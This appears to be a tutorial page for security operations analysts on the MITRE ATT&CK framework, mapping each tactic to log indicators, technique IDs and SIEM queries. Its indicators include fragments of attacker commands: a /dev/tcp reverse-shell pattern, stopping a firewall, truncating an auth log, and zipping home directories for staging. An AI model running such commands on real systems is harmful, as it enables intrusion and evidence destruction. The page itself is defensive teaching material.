Home > SOC Analysis

MITRE ATT&CK Framework

The MITRE ATT&CK Framework is the global standard for understanding how real-world attackers operate. It catalogs the tactics, techniques, and sub-techniques used by threat actors during intrusions.
For SOC analysts, ATT&CK provides a common language, detection roadmap, and analysis structure for mapping attacks, building detection rules, prioritizing alerts, and performing threat hunting.

This chapter explains ATT&CK in full-scale, ultra-practical SOC depth, with real log mappings, examples, usage in SIEM, and how attackers move through the framework during real incidents.

What the MITRE ATT&CK Framework Is

ATT&CK is a knowledge base of real adversary behavior, organized into:

  • Tactics (attacker goals)

  • Techniques (how goals are achieved)

  • Sub-techniques (granular actions)

  • Detections (how to catch them)

  • Mitigations (how to reduce risk)

  • Threat Groups (APT mappings)

  • Software (malware/tool mappings)

SOC teams use it to:

  • Understand attack flow

  • Develop detections

  • Prioritize telemetry sources

  • Map incidents to known TTPs

  • Create threat hunting guides

  • Improve security posture

ATT&CK documents real attacker behavior, not theoretical concepts.

ATT&CK Structure (Practical Breakdown)

MITRE ATT&CK is organized into 14 major tactics, each representing a stage in the attack lifecycle.

Below is a SOC-focused explanation of each tactic.

1. Reconnaissance

Attacker gathers information before intrusion.

Examples:

  • DNS enumeration

  • Port scanning

  • Web crawling

  • Stolen credentials resale

Log Indicators:

ET SCAN Nmap Scripting Engine
DNS queries for subdomains

2. Resource Development

Attackers build infrastructure.

Examples:

  • Register domains

  • Acquire servers

  • Build payloads

  • Create fake accounts

SOC typically detects this through threat intel feeds.

3. Initial Access

How attacker enters the environment.

Examples:

  • Phishing

  • Exploit public-facing apps

  • Valid credential login

Log Indicators:

WINWORD.exe → powershell.exe
Failed → successful login sequence

4. Execution

Running malicious code.

Examples:

  • PowerShell

  • Batch scripts

  • Linux shell scripts

  • Office macros

  • Remote execution (WMI, PsExec)

Indicators:

powershell.exe -enc …
/tmp/x.sh executing

5. Persistence

Keeping access after reboot.

Examples:

  • Registry Run keys

  • Cron jobs

  • Scheduled tasks

  • Startup folders

  • Malicious services

Indicators:

HKCU\...\Run
CRON: (root) CMD (/tmp/bd.py)

6. Privilege Escalation

Gaining elevated permissions.

Examples:

  • sudo abuse

  • Kernel exploits

  • Token manipulation

  • DLL hijacking

Indicators:

sudo: user : COMMAND=/bin/bash
4672 – Special privileges assigned

7. Defense Evasion

Avoiding detection.

Examples:

  • Obfuscation

  • Disabling AV

  • Clearing logs

  • Masquerading filenames

Indicators:

powershell -w hidden
systemctl stop ufw
> /var/log/auth.log

8. Credential Access

Stealing credentials.

Examples:

  • Keylogging

  • LSASS dumping

  • SAM dump

  • SSH key theft

Indicators:

Sysmon EventID 10: LSASS access
/var/log/auth.log abnormal usage

9. Discovery

Understanding the environment.

Examples:

  • AD enumeration

  • Network scanning

  • Process listing

  • File shares discovery

Indicators:

Get-ADUser -Filter *
nmap 10.0.0.0/24

10. Lateral Movement

Moving between systems.

Examples:

  • SMB

  • RDP

  • SSH pivoting

  • WinRM

Indicators:

4624 LogonType 3 from new source
SSH login from internal IP

11. Collection

Gathering sensitive data.

Examples:

  • Password files

  • Database dumps

  • Browser credentials

  • Zip staging

Indicators:

zip -r /tmp/data.zip /home/
mysqldump ...

12. Command and Control (C2)

Maintaining remote control.

Examples:

  • HTTP/HTTPS beaconing

  • DNS C2

  • Reverse shells

  • Encrypted channels

Indicators:

POST /status every 60s
TXT queries with encoded strings
/dev/tcp/<ip>/4444

13. Exfiltration

Removing data from the environment.

Examples:

  • HTTPS uploads

  • DNS tunneling

  • Cloud uploads

  • Email exfiltration

Indicators:

POST /upload SIZE_OUT=6MB
long TXT DNS queries

14. Impact

Final objective.

Examples:

  • Ransomware

  • Data destruction

  • Service disruption

  • Encryption of servers

Indicators:

mass file renames
system shutdown events

How SOC Uses ATT&CK (Real Operations)

1. Incident Mapping

SOC maps events to ATT&CK techniques:

  • Execution → T1059 (PowerShell)

  • Persistence → T1547 (Registry)

  • C2 → T1071 (Web C2)

This identifies attack stage and severity.

2. SIEM Use Case Development

Each ATT&CK technique maps to a detection rule.

Examples:

  • T1059: detect encoded PowerShell

  • T1078: detect abnormal logins

  • T1041: detect large POST exfiltration

SOC uses ATT&CK to build detection coverage.

3. Threat Hunting

Analysts hunt for:

  • Lateral movement (T1021)

  • Recon (T1087, T1049)

  • Persistence (T1053, T1547)

ATT&CK provides hunting hypotheses.

4. Threat Intelligence Correlation

Threat intel often says:

APT29 uses T1059, T1087, T1071

SOC checks logs for those TTPs.

5. Gap Analysis

ATT&CK Heat Maps show:

  • What the SOC detects

  • What is not monitored

  • What techniques are missing

Organizations use ATT&CK to improve maturity.

Practical Examples of ATT&CK Mappings

Example: PowerShell Malware Execution

WINWORD.exe → powershell.exe -enc JAB...

Mapped to:

  • T1566 (Phishing)

  • T1059.001 (PowerShell)

  • T1105 (Ingress Tool Transfer)

  • T1071.001 (Web C2)

Example: RDP Lateral Movement

4624 LogonType=10 from foreign IP

Mapped to:

  • T1021.001 (Remote Services: RDP)

  • T1078 (Valid Accounts)

  • T1110 (Brute Force)

Example: DNS Tunneling

TXT queries > 200 characters

Mapped to:

  • T1572 (Protocol Tunneling)

  • T1041 (Exfiltration Over C2 Channel)

SIEM Queries Using ATT&CK Technique IDs

Detect T1059.001 – PowerShell Execution

process_name:powershell AND CommandLine:*enc*

Detect T1021.002 – SMB Lateral Movement

dst_port:445 AND src_ip:10.* AND dst_ip:10.*

Detect T1566 – Phishing

URL:*login* OR email_from:*microsoft*

Detect T1041 – Exfiltration Over Web

POST AND bytes_out > 1,000,000

ATT&CK becomes the foundation for SIEM logic.

Full Attack Timeline Mapped to ATT&CK

1. Initial Access

T1566 – Phishing

User opens malicious doc

2. Execution

T1059.001 – PowerShell

WINWORD → powershell.exe -enc

3. Persistence

T1547 – Registry Run Key

HKCU\Run\Updater

4. Privilege Escalation

T1068 – Exploits for Priv Esc

sudo: user : COMMAND=/bin/bash

5. Lateral Movement

T1021 – Remote Services

4624 LogonType 3 internal movement

6. Command and Control

T1071.001 – Web C2

POST /status every 60s

7. Exfiltration

T1041 – Data Exfiltration

POST 6MB to external server

ATT&CK shows the entire attack chain.

Analyst Workflow Using ATT&CK

  1. Identify suspicious event

  2. Map it to an ATT&CK technique

  3. Build context around tactic

  4. Check for preceding and following techniques

  5. Validate if this is part of a larger attack chain

  6. Apply relevant detections for adjacent TTPs

  7. Build timeline across tactics

  8. Escalate with ATT&CK mapping

This provides consistency and clarity in SOC investigations.

Intel Dump

  • MITRE ATT&CK organizes attacker behavior into tactics and techniques.

  • 14 tactics represent attacker goals; techniques show how those goals are achieved.

  • SOC uses ATT&CK for detection engineering, incident mapping, threat hunting, and gap analysis.

  • Every major attack creates logs that map to ATT&CK techniques like Execution, Persistence, Lateral Movement, and Exfiltration.

  • ATT&CK-mapped SIEM rules cover encoded PowerShell, abnormal logins, DNS tunneling, beaconing, and malware downloads.

  • ATT&CK helps reconstruct entire kill chains from initial access to impact.

HOME LEARN COMMUNITY DASHBOARD